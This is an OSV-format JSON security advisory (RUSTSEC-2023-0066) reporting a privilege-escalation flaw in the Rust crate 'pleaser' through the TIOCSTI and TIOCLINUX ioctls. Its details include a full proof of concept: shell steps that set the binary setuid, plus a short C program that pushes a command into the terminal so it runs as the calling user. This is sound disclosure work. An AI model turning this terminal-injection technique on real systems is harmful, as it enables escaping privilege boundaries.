{"id":"RUSTSEC-2023-0066","summary":"Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX","details":"please is vulnerable to privilege escalation using ioctls TIOCSTI\nand TIOCLINUX on systems where they are not disabled.\n\nHere is how to see it in action:\n\n```\n$ cd \"$(mktemp -d)\"\n$ git clone --depth 1 https://gitlab.com/edneville/please.git\n$ cd please/\n$ git rev-parse HEAD  # f3598f8fae5455a8ecf22afca19eaba7be5053c9\n$ cargo test && cargo build --release\n$ echo \"[${USER}_as_nobody]\"$'\\nname='\"${USER}\"$'\\ntarget=nobody\\nrule=.*\\nrequire_pass=false' | sudo tee /etc/please.ini\n$ sudo chown root:root ./target/release/please\n$ sudo chmod u+s ./target/release/please\n$ cat \u003c\u003cTIOCSTI_C_EOF | tee TIOCSTI.c\n#include \u003csys/ioctl.h\u003e\n\nint main(void) {\n  const char *text = \"id\\n\";\n  while (*text)\n    ioctl(0, TIOCSTI, text++);\n  return 0;\n}\nTIOCSTI_C_EOF\n$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c\n$ ./target/release/please -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} rather than nobody\n```\n\nPlease note that:\n\nThis affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.","aliases":["CVE-2023-46277","GHSA-cgf8-h3fp-h956"],"modified":"2024-02-10T15:57:43Z","published":"2023-04-29T12:00:00Z","database_specific":{"license":"CC0-1.0"},"references":[{"type":"PACKAGE","url":"https://crates.io/crates/pleaser"},{"type":"ADVISORY","url":"https://rustsec.org/advisories/RUSTSEC-2023-0066.html"},{"type":"REPORT","url":"https://gitlab.com/edneville/please/-/issues/13"}],"affected":[{"package":{"name":"pleaser","ecosystem":"crates.io","purl":"pkg:cargo/pleaser"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.0.0-0"}]}],"ecosystem_specific":{"affects":{"os":[],"functions":[],"arch":[]},"affected_functions":null},"database_specific":{"source":"https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0066.json","informational":null,"cvss":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","categories":["privilege-escalation"]}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"}]}